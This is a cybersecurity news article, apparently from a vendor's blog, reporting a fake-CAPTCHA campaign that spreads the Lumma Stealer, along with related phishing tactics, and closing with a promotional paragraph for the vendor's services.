Cybersecurity experts are raising alarms over a new malware campaign that exploits fake CAPTCHA verification checks to distribute the notorious Lumma information stealer. This global campaign has been identified by Netskope Threat Labs, which reports that victims are being targeted across various countries, including Argentina, Colombia, the United States, and the Philippines.
Key Takeaways
Global Reach: Victims are located in multiple countries, with a focus on various industries.
Attack Methodology: The campaign uses fake CAPTCHA pages to trick users into executing malicious commands.
Evasion Techniques: The malware employs sophisticated methods to bypass security measures.
The attack begins when a user visits a compromised website, which redirects them to a fraudulent CAPTCHA page. Here, the victim is instructed to copy and paste a command into the Windows Run prompt. This command utilizes the native binary to download and execute an HTA file from a remote server.
This method is reminiscent of a previous technique known as ClickFix, which involved executing a Base64-encoded PowerShell script to initiate the Lumma Stealer infection.
Once the HTA file is executed, it runs a PowerShell command that launches a subsequent payload. This payload unpacks another PowerShell script responsible for decoding and loading the Lumma payload, all while attempting to bypass the Windows Antimalware Scan Interface (AMSI) to evade detection.
According to Leandro Fróes, a senior threat research engineer at Netskope Threat Labs, "By downloading and executing malware in such ways, the attacker avoids browser-based defenses since the victim will perform all of the necessary steps outside of the browser context."
The Lumma Stealer operates on a malware-as-a-service (MaaS) model and has shown significant activity in recent months. Its varied delivery methods and payloads complicate detection and blocking efforts, particularly when user interactions are exploited.
Development
In a related development, Lumma has been distributed through approximately 1,000 counterfeit domains that impersonate popular platforms like Reddit and WeTransfer. These domains redirect users to download password-protected archives containing an AutoIT dropper known as SelfAU3 Dropper, which subsequently executes the Lumma stealer.
Earlier this year, threat actors employed a similar strategy, creating over 1,300 domains masquerading as AnyDesk to distribute the Vidar Stealer malware.
The rise of this campaign coincides with the emergence of an updated Phishing-as-a-Service (PhaaS) toolkit called Tycoon 2FA. This toolkit includes advanced features designed to obstruct security tools from confirming its malicious intent and inspecting its web pages. Notably, it uses legitimate, possibly compromised, email accounts to send phishing emails and implements various measures to evade analysis by detecting automated security scripts.
Additionally, social engineering attacks have been observed that leverage Gravatar to create convincing fake profiles mimicking legitimate services. This tactic tricks users into revealing their credentials by exploiting Gravatar's 'Profiles as a Service.'
Stephen Kowski, Field CTO at SlashNext, noted, "Instead of generic phishing attempts, attackers tailor their fake profiles to closely resemble the legitimate services they're mimicking through less known or protected services."
Cybersecurity has never been more critical. At BetterWorld Technology, we empower businesses with advanced solutions to combat emerging threats while driving innovation. Protect your organization with confidence—contact us today to schedule a consultation and secure your company’s future.
Sources
Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks, The Hacker News.